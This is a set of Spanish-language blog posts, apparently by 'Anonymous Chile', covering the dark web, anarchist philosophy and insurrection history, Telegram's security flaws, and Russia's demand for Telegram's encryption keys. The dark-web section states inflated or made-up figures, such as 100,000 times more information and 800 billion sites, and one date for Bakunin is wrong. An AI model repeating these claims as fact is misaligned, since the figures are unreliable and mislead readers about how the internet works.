La Internet Obscura es un conjunto de nodos interconectados entre si y distribuidos por todo el mundo a los cuales se puede ingresar de diferentes modos según sea el caso con el objetivo de anonimizar las comunicaciones cifrando el tráfico de distintas formas y protegiendo la ubicación geográfica de sus usuarios y visitantes que navegan por dicha Internet a fin de crear una red privada que se encuentra disponible únicamente mediante determinados softwares, brindando un acceso seguro y confiable bajo múltiples capas de cifrado de distintos tipos que cubren distintas áreas del tráfico de paquetes transmitido, sus registros, los datos almacenados, la forma en la que trabajan y el software mismo instalado en cada una de las computadoras de sus usuarios, evitando así que dichos servicios, redes internas y sitios web sean detectados, indexados y registrados por los motores de búsqueda así como también dificultando la eventual interceptación, monitorización y rastreo de los mismos por parte de empresas, organizaciones, gobiernos y otras entidades.

Características

  • Posee 100 mil veces más información que la web normal.
  • Alrededor del 60% ~ 80% de la Internet Profunda es de información accesible al público, es decir, no hay que pagar nada por ella.
  • Hay más de 800 mil millones de sitios web asociados a la Internet Obscura.
  • La relación contenido-calidad es de alrededor de un 1000% respecto de la web superficial.
  • Las páginas funcionan bajo software que protege la identidad, información personal, ubicación geográfica y datos de la computadora del usuario.

¿Cuáles son sus niveles?

1. Red Superficial: Son todas aquellas páginas comunes que visitamos en nuestro día a día navegando por Internet.

Ejemplos:

  • Redes sociales
  • Correo electrónio
  • Noticieros
  • Foros
  • Blogs
  • Canales de entretenimiento

2. Internet Obscura: Colección de redes y tecnologías usadas para compartir información, servicios y contenidos digitales de forma cifrada que está distribuida de diferentes formas por todo el mundo y que trata de preservar el anonimato de las identidades de sus usuarios e interlocutores.

Ejemplos:

  • Páginas de descargas pirata.
  • Tablones de imágenes.
  • Sitios de pornografía infantil, venta de objetos robados, tráfico de drogas, armas, personas, cadáveres y órganos o extremidades humanas.
  • Sitios de extremistas, terroristas, grupos ilegales y revolucionarios.
  • Redes privadas, plataformas de comunicación segura para políticos, activistas, periodistas, informantes y empresarios.
  • Redes gubernamentales, sitios de acceso restringido, servicios de inteligencia, sistemas de vigilancia y programas de espionaje.

¿Y qué tan difícil es ingresar a la Internet Obscura?

Cualquier persona puede, siempre que tenga cuidado y sepa dónde y cómo buscar. Por ello, la mejor forma de hacerlo es utilizando Metabuscadores e ingresar siempre mediante el Enrutador Cebolla desde máquinas virtuales con Tails, Whonix, Heads, Kodachi, Qubes OS o Subgraph OS montadas sobre sistemas operativos corriendo en modo portable y todo cubierto bajo VPN (es posible buscar sugerencias aquí).

186 comentarios

Anarquismo: Una tradición revolucionaria y filosófica

Publicada el 11/10/2018 por Anonymous Chile

El nudo entre filosofía y anarquismo parece haber estado deshecho durante mucho tiempo, incluso puede que haya carecido de fundamento. Al contrario del marxismo, hemos de decir que el anarquismo habría desparecido de la escena social y política con el desastre de la Guerra Civil española. Además, el pensamiento libertario nunca habría constituido una filosofía digna de este nombre, de ahí la falta de interés de los filósofos y, con más razón, de las instancias académicas.[1]

El anarquismo nace a mediados del siglo XIX, en la misma época que el marxismo, a partir de preocupaciones semejantes —la cuestión social y los movimientos obreros—, pero siguiendo unas modalidades prácticas y teóricas bastante claramente diferenciadas. Su gestación se produce a partir de dos procesos distintos. En primer lugar, hay un discurso teórico y político que le confiere su concepto principal: la anarquía se considera un valor positivo, a la vez para explicar la realidad del mundo y, de manera aparentemente más sorprendente, para expresar cómo este mundo, situado desde un principio bajo el signo de la dominación y de la explotación del hombre por el hombre, podría emanciparse y afirmar la libertad y la igualdad de todos mediante lo que Pierre-Joseph Proudhon denomina la anarquía positiva. La originalidad de este nacimiento se debe a que este no depende de un único teórico, contrariamente por ejemplo al marxismo, sino de posicionamientos múltiples y diferentes, de autores en sí mismos muy diversos en cuanto a sus puntos de vista, que se leen y se reconocen sin que se pongan de acuerdo, ni constituyen un grupo ni se someten a la autoridad o a la maestría de uno de ellos.

De estos autores, Proudhon es sin duda el más conocido (léase el artículo de Edgard Castleton que aparece publicado dentro del dossier de la edición impresa «El intratable Pierre-Joseph Proudhon»). Él es quien, antes que nadie, en 1840, en su libro ¿Qué es la propiedad?, se refiere de forma explícita y, de manera teórica, determinante a la idea de anarquía. Es asimismo él quien produce la obra más consecuente, aunque solo sea en cantidad. Pero, a su lado, hay que citar igualmente a Max Stirner, cuyo libro El único y su propiedad (1845) se convertirá en una de las referencias ulteriores del anarquismo, que estaba naciendo entonces. O incluso al médico Ernest Coeurderoy (1825-1862),[2] al pintor-empapelador Joseph Déjacque (1822-1864)[3] y, por supuesto, a Mijaíl Aleksandrovich Bakunin (1814-1816), un viejo y atípico hegeliano de izquierdas que, en cuestión de años, no solo contribuiría de forma determinante al desarrollo del pensamiento libertario, sino, asimismo, en oposición al marxismo, al nacimiento del anarquismo obrero.

La segunda cuna del anarquismo, desde el punto de vista filosófico, se halla (paradójicamente) justo donde no esperaríamos encontrarla: en las prácticas obreras y revolucionarias que, bajo formas muy diferentes y durante un poco más de medio siglo, desde la Primera Internacional hasta el aplastamiento de la revolución española en mayo de 1937, se manifiestan en la mayoría de países en vías de industrialización, en Francia, en España y en Italia, pero asimismo desde Rusia hasta los Países Bajos y desde Estados Unidos hasta Brasil y Argentina.

Desde los obreros relojeros de la Federación Jurasiana hasta la poderosa Confederación Nacional del Trabajo (CNT) española,[4] continuamente renacientes aunque esporádicos y de corta duración debido a su radicalidad, estos movimientos siguen sin conocerse bien.[5] Desparecieron sucesivamente, en el momento de su apogeo, a causa de tres golpes: la Primera Guerra Mundial en el caso europeo, la violenta reacción de los diferentes fascismos y otros regímenes militares que se impusieron en muchos lugares del mundo a lo largo de los años veinte y treinta, y, en último lugar, la versión del «comunismo» que reinaba entonces a la sombra de la dictadura estatal en Rusia.

Habrá que esperar a los acontecimientos conocidos como Mayo del 68 y, desde una óptica más global, al último cuarto del siglo XX para que el proyecto y el pensamiento libertario renazcan de sus cenizas. Y esto, de nuevo, bajo el efecto de un doble impulso.

El producido tanto por los movimientos como por las formas de reivindicación y de acción (autogestión, asambleas generales, luchas antiautoritarias) que, durante algunos años, recorren un gran número de países; y el dado en el plano filosófico por una constelación de enfoques teóricos originales y diversos, desde Jean Baudrillard hasta Gilles Deleuze pasando por Michel Foucault, Jacques Derrida, Félix Guattari y muchos otros.

Con lo que podríamos definir como un nietzscheanismo de izquierdas, no asistimos únicamente a la emergencia de un pensamiento emancipador capaz de hacer vacilar cincuenta años de hegemonía marxista de izquierdas. Era asimismo posible dar sentido al anarquismo, a su dimensión teórica —un inmenso corpus de textos, tratados, opúsculos, así como trabajos inéditos a menudo heteróclitos, difícilmente accesibles y en parte perdidos (respecto de Bakunin)—, pero también, y de forma más sorprendente, a un conjunto de movimientos y de experimentos libertarios, en particular obreros, de los que comenzamos a percibir la importancia. Este sorprendente encuentro entre movilizaciones y nietzscheanismo de izquierdas, con toda la razón denunciado por sus enemigos bajo el nombre de «pensamiento del 68»,[6] presenta tres características singulares.

En primer lugar, el separatismo, la autonomía y la diferenciación. Es decir, la capacidad de los oprimidos de convertirse en «dueños», sus «propios dueños» como dicen los sindicalistas libertarios, al extraer de ellos mismos y de sus movimientos todo lo necesitan para cambiar el mundo. En un libro póstumo, De la capacidad política de la clase obrera (entonces leído y releído por militantes obreros), y en términos eminentemente nietzscheanos, Proudhon explica: «La separación que recomiendo es la condición misma de la vida. Diferenciarse, definirse, es ser; al igual que confundirse y absorberse, es perderse. Que la clase obrera se dé por enterada: ante todo es necesario que deje de estar tutelada y de ahora en adelante actúe exclusivamente por sí misma y para ella misma».[7]

En su lucha por la emancipación, los diferentes movimientos del anarquismo obrero consideran efectivamente que no tienen que pedir nada a nadie, puesto que pretenden «ser todo» (como se pone de manifiesto en la letra de La Internacional). Buscan algo completamente nuevo y que nadie se lo puede dar porque son ellos quienes lo aportan.

En el segundo punto de encuentro filosófico entre el nietzscheanismo de izquierdas y el anarquismo obrero se hallan el federalismo y el pluralismo. Conocemos la concepción nietzscheana de la voluntad de poder, concebida bajo la forma de una pluralidad de pulsiones, fuerzas y deseos. Nos es menos conocido el modo original mediante el cual los diferentes movimientos obreros anarquistas materializaron el concepto de «fuerza colectiva» de Proudhon, ese compuesto de potencias, esa resultante de los conflictos y de la asociación de una multitud de tendencias diferentes y contradictorias.

A la voluntad de poder de Nietzsche concebida bajo la forma de «complejos de fuerzas que se unen o se rechazan, se asocian o se disocian», escribe Michel Haar,[8] responden así, en muchos lugares del mundo y durante más de medio siglo, la tensión, el equilibrio y la multiplicidad de prácticas y de modos de organización basados totalmente en el federalismo, en la libre asociación, en la afinidad y en el contrato siempre revocable. Pero también en la vida intensa y agitada de procesos de masas en los que cada ser —individuo, grupo, sindicato, comuna, unión o federación…— dispone de una completa autonomía, de la posibilidad de poder separarse.

A estos dos primeros encuentros, más allá del tiempo y del espacio, entre el anarquismo práctico y el pensamiento de Nietzsche, pero asimismo de Gottfried Wilhelm Leibniz, de Baruch Spinoza, de Alfred North Whitehead y de muchos otros, podemos añadir un tercero, quizás el más importante: la acción directa y el rechazo de la representación. Para el anarquismo, así como para Nietzsche por ejemplo, se ha de ir más allá de las mentiras y de las trampas de la representación política o social que los movimientos libertarios han denunciado incansablemente y de la que Pierre Bourdieu ha analizado los ardides y la credulidad excesiva en ella.[9]

Al igual que Nietzsche y continuando con Bourdieu, el anarquismo pretende ir a las raíces de la dominación y poner al día los mecanismos de la representación lingüística y simbólica. Es ahí donde Dios, la ciencia y los discursos mentirosos vienen a confundirse con el Estado, ese «perro hipócrita —denuncia Nietzsche— al que le gusta disertar para hacer creer que su voz sale del interior de las cosas».[10] Ahí donde están, como explica Victor Griffuelhes, uno de los responsables de la Confederación Nacional del Trabajo (CGT) francesa antes de 1914, «la confianza en el poder de los políticos y la confianza en el Dios del sacerdote, el sindicalismo sustituye estas por la confianza en uno mismo, esto es, por la acción directa».[11]

Expresando sus potencialidades revolucionarias en el contexto particular de los años sesenta y setenta, el pensamiento de Mayo del 68 no se contenta con dar sentido a ese anarquismo del pasado que alimenta las razones de su propia radicalidad. Contribuye a inscribirlo en una tradición filosófica mucho más vasta, oculta en los defectos de un orden real o imperial. Al igual que Nietzsche algunos años más tarde, el anarquismo nació en un día concreto, en algún lugar de Europa. Pero al igual que él se sorprendía «de escribir libros tan buenos» y asimismo de reencontrar sus propias ideas en Leibniz y en Spinoza, la idea anarquista puede a su vez sorprenderse de dar sentido al conjunto de la historia humana, de los esclavos de las revueltas de Espartaco a los ismailíes reformados del siglo XII persa, a los «turbantes amarillos» del taoísmo del siglo II antes de Cristo o a los husitas checos del siglo XV.

El anarquismo no es una filosofía, ni tan siquiera es un programa político o un modelo de funcionamiento social y económico. A través de sus múltiples caras y de su forma de responderse a sí mismo, en otros lugares, antaño y en el interior de una multitud de prácticas diferentes, el proyecto libertario se afirma como una relación con el mundo que difiere radicalmente de las prácticas, de los códigos, de las percepciones y de las representaciones existentes. Deshace estos en beneficio de una recomposición de la totalidad de lo que es, cuando la vida cotidiana, las prácticas políticas y sociales, las creaciones artísticas, la ética y los ejercicios del pensamiento no son más que ocasiones distintas de expresar y de repetir cada una por sí misma lo que les aglutina a todas ellas.

[1] La First Anarchist Studies Conference (organizada del 4 al 6 de septiembre de 2008 por el Centre for the Study of International Governance de la Universidad de Loughborough [Reino Unido]) confirma a este respecto una renovación. Los ciento cincuenta participantes provenían de la mayoría de los países anglófonos, pero asimismo de la República Checa, de Grecia, de Países Bajos, de Israel, de Turquía y de Dinamarca.

[2] Autor de Hurrah! ou la Révolution par les cosaques (1854), Cent Pages, Grenoble, 2000.

[3] Cfr. la compilación de textos A bas les chefs!, Champ libre, París, 1979.

[4] Entre las organizaciones más importantes, señalamos: en Francia, la Federation des Bourses du Travail y la Confederación General del Trabajo (CGT, sindicato francés), desde finales del siglo XIX hasta principios de los años veinte; en Italia, la Unión Sindical Italiana (USI, en sus siglas en italiano), desde 1912 hasta 1922; en España, la Confederación Nacional del Trabajo (CNT), desde 1911 hasta 1937; la Federación Obrera Regional Argentina (FORA), desde 1901 hasta 1930; la CGT portuguesa, desde 1919 hasta 1924; los Industrial Workers of the World (IWW), desde 1905 hasta 1917; en Suecia, la Organización Central de Trabajadores de Suecia (SAC, en sus siglas en sueco), desde 1910 hasta 1934; en Holanda, el Secretariado Nacional de los Trabajadores (NAS, en sus siglas en sueco), desde 1895 hasta principios de los años veinte, la Unión Libre de Trabajadores de Alemania (FAUD, en sus siglas en alemán), a principios de los años veinte, etc.

[5] Léase Daniel Colson, Anarcho-syndicalisme et communisme, Saint Etienne, 1920-1925, Atelier de création libertaire, Lyon, 1986, y, sobre el anarquismo obrero brasileño, Jacy Alves de Seixas, Mémoire et oubli. Anarchisme et syndicalisme révolutionnaire au Brasil, Maison des sciences de l’homme, París, 1992.

[6] Luc Ferry y Alain Renault, La pensée 68. Essai sur l’antihuma-nisme contemporain, Gallimard, París, 1985.

[7] Pierre-Joseph Proudhon, La capacidad política de la clase obrera, Júcar, Asturias.

[8] Michel Haar, Nietzsche et la métaphysique, Gallimard, París, 1993.

[9] Pierre Bourdieu, «La délégation et le fétichisme politique», Actes de la recherche en sciences sociales, nº 52-53, París, junio de 1984.

[10] Friedrich Nietzsche, Así habló Zaratustra, Edimat Libros, Madrid, 2003.

[11] Victor Griffuelhes, Le Syndicalisme révolutionnaire, La Publication sociale, París, 1909.

¿Es Telegram realmente seguro?

Publicada el 23/09/2018 - 13/10/2018 por Anonymous Chile

Telegram vuelve a estar en boga y no precisamente por una buena razón. Las agrupaciones terroristas y criminales están animando a sus seguidores a usar Telegram para que las conversaciones que realizan sean invisibles a los agentes de la ley, pero, según algunos expertos en seguridad, la aplicación puede no ser tan segura como los terroristas piensan.

Telegram es un servicio de mensajería instantánea segura, de código libre, con cifrado E2E y autodestrucción de mensajes utilizado por muchas más personas de las que aparece en el telediario, ya que de hecho, no solamente los criminales utilizan esta aplicación, sino que el año pasado consiguió más de 50 millones de usuarios nuevos y se enviaron a través de ella más de 1 billón de mensajes al día.

Es por ello así que el investigador de seguridad conocido como «The Grugq» ha indicado en su blog varias falencias en el respectivo software que podrían arriesgar la privacidad de la información y comunicaciones ahí transferidas.

Propenso a errores

La función de comunicación cifrada no viene preconfigurada por defecto. Es decir, si queremos tener una comunicación privada, primero debemos acceder al perfil del usuario con quien deseamos comunicarnos y seleccionar “Nuevo chat secreto” antes de comenzar y esto no cubre las conversaciones grupales. Además, no es posible cifrar una conversación existente.

Robo de contactos

Telegram requiere de un número de teléfono móvil para ingresar y carga todos los contactos guardados en la tarjeta SIM del dispositivo en sus servidores con el objetivo de sincronizarlos para ver si alguno ya tiene una cuenta y así conectarlo inmediatamente con el presente usuario, lo cual genera un registro de las comunicaciones de dicha persona sin su consentimiento ni autorización que podría identificar y rastrear a las personas con quienes habla por teléfono mediante la recopilación del mencionado registro, el cual señala los contactos enlazados a su número telefónico y que se encuentra almacenado en los servidores de la plataforma.

“Esto permite a Telegram construir un mapa de la red social y conocer la forma en que sus usuarios se conocen” – escribe the Grugq en su blog.

Fuga de metadatos

El uso de un teléfono móvil expone a una gran cantidad de metadatos. Incluso si la comunicación segura está activada, la policía puede recoger metadatos para comprometer los servidores, lo cual ayudaría a localizar a quién se refirió a quién, en qué momento, desde qué dispositivo y ubicación geográfica.

El cifrado

Muchos expertos en seguridad están preocupados por el cifrado que usa Telegram, aunque este nunca se ha vulnerado públicamente teniendo en cuenta que la propia aplicación anunció un concurso en el cual quien consiguiese romper su cifrado, conseguiría un premio de USD $300.000, pero nadie lo ha reclamado aún.

En consecuencia, podemos sugerir que se utilice Telegram desde máquinas virtuales con Tails, Whonix, Heads, Kodachi, Qubes OS o Subgraph OS montadas sobre sistemas operativos corriendo en modo portable y todo cubierto bajo VPN (es posible buscar sugerencias aquí) complementada con El Enrutador Cebolla (TOR, The Onion Router), mediante una cuenta de usuario registrada con tarjetas SIM totalmente vacías y desechables para así actualizar periódicamente el número telefónico enlazado a la cuenta y cifrar los mensajes (sobre todo aquellos más delicados o con información altamente confidencial) con criptografía asimétrica con GPG (GNU Privacy Guard).

Junto a esto también, para profundizar aún más en el tema, los detalles sobre el funcionamiento de Telegram y sus riesgos de seguridad, dejaremos un informe en PDF donde se explica específicamente la materia en disputa.

CCN-CERT: Riesgos de uso de Telegram

82 comentarios

El TS ruso ratifica la solicitud del FSB de tener acceso a las claves de cifrado de los mensajes de Telegram

Publicada el 23/09/2018 por Anonymous Chile

El Tribunal Supremo de Rusia ha confirmado las peticiones del Servicio Federal de Seguridad (FSB) de que Telegram proporcione sus claves de cifrado para acceder al contenido de los mensajes de los usuarios, tal y como ha informado esta mañana la agencia de noticias Interfax.

El Alto Tribunal apoya el argumento del FSB que establece una distinción entre recibir los medios para descifrar el contenido y recibir acceso al contenido mismo.

Por ello, la cesión de las claves de cifrado “sólo crea la base para acceder a la información“, sin que ello implique ninguna violación del derecho constitucional de los ciudadanos rusos al secreto de la correspondencia.

Adoptada en 2016, la nueva legislación rusa (denominada “Ley Yarovaya” o “Ley del Gran Hermano”) requiere que las aplicaciones de mensajería y otros “organizadores de la distribución de información” añadan código adicional a los mensajes electrónicos para que el FSB pueda descifrarlos.

En su momento, Telegram aceptó registrar su servicio en Rusia, pero se negó a cooperar con el servicio secreto debido a que “las leyes del país eran incompatibles con la política de privacidad de Telegram”.

En abril de 2018, un tribunal de Moscú decidió bloquear “inmediatamente” el acceso al la aplicación de mensajería instantánea, tras la negativa de Telegram a proporcionar las claves de cifrado al FSB. El juicio duró menos de 20 minutos, según informes de los medios de comunicación. Tuvo lugar en ausencia de la defensa de Telegram y el fundador de Telegram, Pavel Durov, se negó a “legitimar” con su presencia lo que él considera una “farsa abierta”.

Como consecuencia de dicha decisión judicial, Roskomnadzor, el regulador ruso de Internet y telecomunicaciones, intentó bloquear el acceso al servicio en Rusia. Dichos intentos han tenido poco éxito hasta el momento pero si que han ocasionado daños sustanciales a numerosas empresas, algunas sin relación alguna con Telegram.

Anarquismo, insurrecciones e insurreccionalismo

Publicada el 23/09/2018 por Anonymous Chile

La insurrección —el levantamiento armado del pueblo— ha estado siempre rondando al corazón del anarquismo. Los primeros documentos programáticos del movimiento anarquista, fueron redactados por Bakunin y por un grupo de republicanos europeos de izquierda insurgente en transición al anarquismo en la Italia del 1860. En ellos, no rompían con el insurreccionalismo, sino que con el republicanismo de izquierda; poco después, Bakunin tomaría parte en una insurrección en Lyon, en 1870.

La política radical europea de los cien años previos, había estado dominada por insurrecciones diversas, desde que la exitosa insurrección de 1789, en Francia, desencadenó el proceso que llevó al derrocamiento global del orden feudal. El asalto a la Bastilla del 14 de Julio de 1789 demostró el poder del pueblo en armas; este movimiento insurrecional que cambiaría la historia de Europa, probablemente fue llevado a cabo por tan sólo mil personas.

Insurrección y política de clases

1789 también impuso el patrón de que, siendo la clase trabajadora la que constituía la masa insurgente, fue la burguesía la que cosechó los beneficios —suprimiendo a las masas en el proceso de introducir su dominio de clase. Esta lección no pasó desapercibida para quienes vieron la libertad como algo que involucraba la liberación económica y social de todos, y no el derecho de una nueva clase a explotar “democráticamente” a las masas.

En las insurrecciones republicanas que estallaron en Europa en el siglo siguiente, y particularmente en 1848, el conflicto entre las clases de capitalistas y pequeños capitalistas republicanos con las masas republicanas, se agudizó más y más. Hacia 1860, este conflicto llevó a la emergencia de un movimiento específicamente socialista que crecientemente fue percatándose de que la libertad para todos es algo que la burguesía republicana combatiría —del lado del viejo orden de ser necesario. Para Bakunin, fue la experiencia de la insurrección polaca de 1863 la cual le aclaró definitivamente que la burguesía republicana temía a una insurrección campesina más que al Zar. Entonces, la lucha por la libertad tendría que realizarse bajo una nueva bandera —una que buscase la organización de las masas trabajadoras según sus intereses exclusivos.

Estos anarquistas tempranos, acogieron las nuevas formas emergentes de organización obrera, y en particular, la Asociación Internacional de Trabajadores o Primera Internacional. Pero pese a que vislumbraron el poder de la clase obrera organizada en sus sindicatos, a diferencia de la mayoría de los marxistas, no entendieron esto como señal de que el capitalismo podría ser reformado. Los anarquistas insistían en que la insurrección sería aún necesaria para derrocar a la vieja clase dominante.

Insurrecciones anarquistas tempranas

Los intentos insurreccionalistas anarquistas se desarrollaron junto al crecimiento del movimiento. De hecho, incluso antes del alzamiento de Lyon, el anarquista Chávez López ya había estado envuelto en un movimiento insurgente indígena en México en abril de 1869, proclamando un manifiesto que llamaba a «reemplazar con el principio de gobiernos comunales autónomos,la soberanía del gobierno nacional, ya conocido como el corrupto colaborador de los hacendados».[1] En España en los 1870s, los intentos de los obreros de formar sindicatos enfrentaron una fuerte represión, con los anarquistas involucrados en múltiples insurrecciones, las que en el caso de algunos pequeños centros industriales durante las insurrecciones de 1873, fueron localmente exitosas. En Alcoy, por ejemplo, luego de que los obreros papeleros en huelga por una jornada de ocho horas fueran reprimidos, “los obreros ocuparon e incendiaron las fábricas, asesinaron al alcalde, y marcharon por las calles con las cabezas de los policías que habían masacrado”[2] En España se verían muchas insurrecciones lideradas por los anarquistas, antes de llegar a la más exitosa —aquella que enfrentó y casi derrotó al golpe fascista de Julio de 1936.

En Italia en 1877, Malatesta, Costa y Cafiero lideraron una banda armada en dos poblados de la Campania. Ahí quemaron los registros de impuestos y declararon el fin del reinado de Víctor Emmanuel —sin embargo, sus esperanzas de despertar la insurrección fracasaron y las tropas no tardaron en llegar. Bakunin ya había estado involucrado en un intento de insurrección en Boloña, en 1874.

Los límites de las insurrecciones

Muchos de estos intentos insurreccionales tempranos, llevaron a una severa represión estatal. En España, el movimiento fue forzado a la clandestinidad a mediados de los 1870. Esto llevó al movimiento al período de la “Propaganda por el Hecho”, en el que algunos anarquistas reaccionaron a esta represión con el asesinato de elementos de la clase dominante, incluídos algunos reyes y presidentes. El Estado, a su vez, escaló la represión, luego de algunos bombazos en Barcelona en 1892, y alrededor de 400 personas fueron llevadas a las mazmorras de Montjuich, donde fueron torturadas. Se les arrancaron las uñas, los hombres colgaban de los techos y sus genitales les eran torcidos y quemados. Muchos murieron a causa de la tortura antes de ser llevados a juicio y cinco serían luego ejecutados.

Se puede argumentar que la falla teórica fatal durante este período, fue la creencia de que los trabajadores en todas partes estaban prestos a rebelarse y por tanto, todo lo que los grupos anarquistas debían hacer era encender este reguero de pólvora con una insurrección. Esta debilidad teórica, no sólo era exclusiva del anarquismo —como ya hemos visto, tal era también el enfoque del republicanismo radical, lo que significó que a veces, como en España y en Cuba, anarquistas y republicanos se encontraron luchando juntos en contra de las fuerzas estatales. En otros lugares, la izquierda también jugó tal rol —la Rebelión de Pascuas de 1916 en Irlanda vio una alianza militar entre sindicalistas revolucionarios y nacionalistas.

Sin embargo, la aproximación organizativa original de los anarquistas del círculo de Bakunin no se limitaba a organizar intentos insurreccionales, sino que además, incluía el involucramiento de los anarquistas en las luchas de las masas obreras. Si bien algunos anarquistas respondieron a las circunstancias generando una ideología alrededor del “ilegalismo”, la mayoría comenzaba a orientarse hacia estas luchas de masas y, en particular, formaban y entraban a los sindicatos de masas, sobre bases sindicalistas revolucionarias. En los primeros años del siglo XX, los anarquistas participaban, o sencillamente formaron, la mayoría de los sindicatos revolucionarios que dominaron la arena de la política radical hasta la Revolución Rusa. Muchas veces, estos mismos sindicatos se veían ellos mismos envueltos en insurrecciones, como en 1919 en Argentina y Chile, que incluyó en Chile a trabajadores que “tomaron posesión de la ciudad patagónica de Puerto Natales, bajo las banderas rojas y los principios anarco-sindicalistas”.[3] Anteriormente, en 1911, los anarquistas mexicanos del PLM, con ayuda de muchos miembros de la IWW de los EEUU, “organizaron batallones… en Baja California y tomaron posesión de la ciudad de Mexicali y de las áreas circundantes”.

Insurrecciones y Comunistas Anárquicos

La tradición organizativa de los anarco-comunistas en el anarquismo, puede ser rastreada hasta Bakunin y los primeros documentos programáticos producidos por el emergente movimiento anarquista de los 1860s. Pero estas ideas organizativas no fueron desarrolladas de ninguna manera colectiva, sino hasta la década del 1920. Aún había individuos y grupos que defendían los principios claves del anarco-comunismo organizado; presencia en la lucha de masas del pueblo obrero y necesidad de una organización y propaganda anarquistas específicas.

El anarco-comunismo se perfiló claramente en 1926 cuando un grupo de revolucionarios exiliados analizaron el por qué del fracaso de sus esfuerzos hasta la fecha. El resultado de este proceso fue la publicación de un documento conocido como la “Plataforma Organizativa de los Comunistas Libertarios”, que ya hemos en otras ocasiones analizado en detalle.[4]

Lo relevante en este caso, es llamar la atención de que, al igual que sus predecesores de 1860, este grupo de anarco-comunistas trataban de aprender de la participación de los anarquistas en las insurrecciones y revolución del período de 1917-1921. En este grupo se encontraba Nestor Makhnó, figura clave de la masiva insurrección conducida por los anarquistas en la Ucrania occidental. El Ejército Insurgente Revolucionario de Ucrania luchó durante esos años contra los austro-húngaros, contra los pogrom anti-semitas, varios ejércitos blancos y contra el Ejército Rojo controlado por los bolcheviques.

Los “plataformistas”, como se les llamaría después, escribieron “El principio de la esclavitud y de la explotación de las masas por la violencia, constituye la base de la sociedad moderna. Todas las manifestaciones de su existencia: economía, política, relaciones sociales, descansan sobre la violencia de clase, cuyos órganos de los que sirve son: Autoridad, la policía, el ejército, los juzgados… El progreso de la sociedad moderna: la evolución del Capital y el perfeccionamiento de su sistema político, fortalece el poder de la clase dominante, y hace la lucha en contra de ellos más difícil… El análisis de la sociedad moderna nos lleva a la conclusión que la única vía para transformar la sociedad capitalista en una sociedad de trabajadores libres, es la vía de la Revolución Social violenta”.[5]

La experiencia española

El siguiente desarrollo del comunismo anárquico, una vez más, iba de la mano de quienes habían estado al centro de una experiencia insurreccional — esta vez, el grupo “Los Amigos de Durruti”, activos en la insurrección de Barcelona de Mayo de 1937. Los “miembros y simpatizantes (de los Amigos de Durruti) eran camaradas prominentes del frente de batalla de Gelsa”.[6]

Los Amigos de Durruti estaba compuesto de miembros de la CNT que eran altamente críticos del rol jugado pro esta organización en 1936: “No se supo valorizar la C.N.T. No se quiso llevar adelante la revolución con todas sus consecuencias. Se temieron las escuadras extranjeras… ¿Es que se ha hecho alguna revolución sin tener que afrontar innúmeras dificultades? ¿Es que hay alguna revolución en el mundo de tipo avanzado que haya podido eludir la intervención extranjera?… Partiendo del temor y dejándose influenciar por la pusilanimidad no se llega nunca a la cima. Solamente los audaces, los decididos, los hombres de corazón, pueden aventurarse a las grandes conquistas. Los temerosos no tienen derecho a dirigir las multitudes… La C.N.T. debía encaramarse en lo alto de la dirección del país, dando una solemne patada a todo lo arcaico, a todo lo vetusto, y de esta manera hubiésemos ganado la guerra y hubiéramos salvado la revolución… Pero se procedió de una manera opuesta… Se inyectó un balón de oxígeno a una burguesía anémica y atemorizada”.[7]

A lo largo y ancho del mundo, el anarquismo había sido aplastado en el período previo, durante y después de la Segunda Guerra Mundial. Los anarquistas se vieron participando en los movimientos guerrilleros anti-fascistas de Europa durante la Guerra, pero después, fueron reprimidos tanto por el “comunismo” oriental, así como por la “democracia” occidental. En Uruguay, uno de los pocos lugares donde un significativo movimiento anarquista sobrevivió, la FAU libró una lucha armada clandestina en contra de la dictadura militar en los 70s. Los anarco-sindicalistas cubanos, en particular los obreros tabacaleros, jugaron un significativo rol en la Revolución Cubana, sólo para ser reprimidos posteriormente por el nuevo régimen.

La ideología del insurreccionalismo

Hay una larga tradición en el anarquismo de construir ideologías alrededor de una táctica. No sorprende, entonces, que a larga y honda participación de anarquistas en insurrecciones ha dado origen a una ideología anarquista insurreccionalista.

Una definición temprana del insurreccionalismo (en inglés) la encontramos en esta traducción de 1993: “Consideramos como la forma de lucha más adecuada en el presente estado del conflicto de clases, en casi todas las situaciones, a la lucha insurreccional, y esto es particularmente cierto en el área mediterránea. Por práctica insurreccionalista, nos referimos a la actividad revolucionaria que intenta recuperar la iniciativa en la acción y no se limita a esperar o a simples respuestas defensivas para atacar a las estructuras de poder. Los insurreccionalistas, no se suscriben a las prácticas cuantitativas de esperar, por ejemplo, a los proyectos organizativos cuyo primer objetivo es crecer en números antes de intervenir en las luchas, y que, durante este período de espera, se limitan al proselitismo y a la propaganda, o a la tan estéril como inocua contrainformación”.[8]

Como ideología, el insurreccionalismo se origina en las peculiares condiciones de Italia y Grecia en la post-guerra. Hacia fines de la Segunda Guerra Mundial, había una posibilidad revolucionaria real en ambos países. En muchas áreas, los partisanos de izquierda expulsaron a los fascistas antes de que las fuerzas aliadas llegaran. Pero según los acuerdos de Yalta, Stalin instruyó a la izquierda revolucionaria oficial en el Partido Comunista, que contuvieran la lucha. Como resultado de ello, Grecia pasaría décadas bajo dictaduras militares, mientras que en Italia, el Partido Comunista, continuaba conteniendo las luchas. El insurreccionalismo fue una entre muchas ideologías socialistas nuevas que nacieron debido a estas particulares circunstancias. El desarrollo del insurreccionalismo en ambos países, empero, está más allá del enfoque de este artículo. Lo que más nos interesa, es el desarrollo de la ideología insurreccionalista en el mundo angloparlante.

Insurreccionalismo en el mundo angloparlante

Un insurreccionalista ha descrito cómo las ideas llegaron desde Italia, “El anarquismo insurreccionalista se ha desarrollado en el movimiento anarquista de habla inglesa desde los 80s, gracias a las traducciones y escritos de Jean Weir en sus ‘Ediciones Elephant’ y en su revista ‘Insurrection’… En Vancouver, Canadá, los camaradas que participaban en la Cruz Negra Anarquista, así como en el Centro Social Anarquista local, y en las revistas ‘No Picnic’ y ‘Endless Struggle’ fueron influenciados por los proyectos de Jean y esto conllevó a la práctica siempre en desarrollo de los anarquistas insurreccionalistas de esa región hoy día… La revista anarquista ‘Demolition Derby’ en Montreal también hablaba de algunas noticias anarquistas insurreccionalistas en aquellos días”.[9]

